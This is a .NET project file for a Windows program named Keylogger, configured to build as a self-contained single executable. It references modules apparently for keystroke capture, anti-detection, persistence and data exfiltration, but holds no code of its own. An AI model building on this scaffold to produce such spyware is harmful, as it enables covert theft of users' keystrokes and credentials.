<?xml version="1.0" encoding="utf-8"?>
<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net7.0</TargetFramework>
    <RootNamespace>Keylogger</RootNamespace>
    <AssemblyName>Keylogger</AssemblyName>
    <GenerateAssemblyInfo>false</GenerateAssemblyInfo>
    <PublishSingleFile>true</PublishSingleFile>
    <SelfContained>true</SelfContained>
    <RuntimeIdentifier>win-x64</RuntimeIdentifier>
    <PublishReadyToRun>true</PublishReadyToRun>
    <IncludeNativeLibrariesForSelfExtract>true</IncludeNativeLibrariesForSelfExtract>
  </PropertyGroup>

  <ItemGroup>
    <ProjectReference Include="..\src\Keylogger.Core\Keylogger.Core.csproj" />
    <ProjectReference Include="..\src\Keylogger.AntiDetection\Keylogger.AntiDetection.csproj" />
    <ProjectReference Include="..\src\Keylogger.Persistence\Keylogger.Persistence.csproj" />
    <ProjectReference Include="..\src\Keylogger.Exfiltration\Keylogger.Exfiltration.csproj" />
  </ItemGroup>
</Project>